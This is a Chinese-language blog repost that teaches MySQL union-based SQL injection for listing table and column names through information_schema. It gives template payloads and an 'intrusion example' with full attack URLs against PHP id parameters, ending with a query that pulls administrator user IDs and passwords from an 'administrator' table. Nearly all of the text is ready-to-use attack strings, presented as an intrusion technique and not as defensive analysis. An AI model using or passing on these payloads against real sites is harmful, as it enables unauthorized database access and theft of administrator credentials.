php+MySql注入非暴力爆字段名
生活随笔
收集整理的這篇文章主要介紹了
php+MySql注入非暴力爆字段名
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
MySql數(shù)據(jù)庫的版本夠了,不需要暴力猜表的,而是“查”表
表可以爆了,出來了,字段出不來怎么辦?其實字段也可以查出
查表段時的格式是:
| ? +union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=數(shù)據(jù)庫名字的hex order by table_schema limit 6,7)t limit 1-- |
那么,查字段的格式就是:
| ? +union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出來的表名的hex值 and table_schema=數(shù)據(jù)庫名的hex值 order by 1 limit 2,3)t limit 1-- |
與爆表類似
在最后一個limit 6,7很明顯是范圍,從0,1、1,2、2,3、3,4的這么查下去就可以了,直到查出來想要的表名
看一個入侵實例:
本帖隱藏的內(nèi)容需要回復(fù)才可以瀏覽
爆表:
| ? http://site/newinfo.php?id=125+and+1=2+union+select+1,2,3,table_name,5,6,7,8,9,10+from+(select+*+from+information_schema.tables+where+table_schema=0x796B7873676F76+order+by+table_schema+limit+0,1)t+limit+1-- |
爆字:
| http://site/jg_view.php?id=141+and+1=2+union+select+1,2,column_name,4,5+from+(select+*+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72+and+table_schema=0x796B7873676F76+order+by+1+limit+2,3)t+limit+1--? |
使用前面爆出來的:
| ? http://site/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator |
轉(zhuǎn)載于:https://www.cnblogs.com/amwld/archive/2011/05/29/2061788.html
總結(jié)
以上是生活随笔為你收集整理的php+MySql注入非暴力爆字段名的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Silverlight Telerik控
- 下一篇: MOSS2010站点大文件上传设置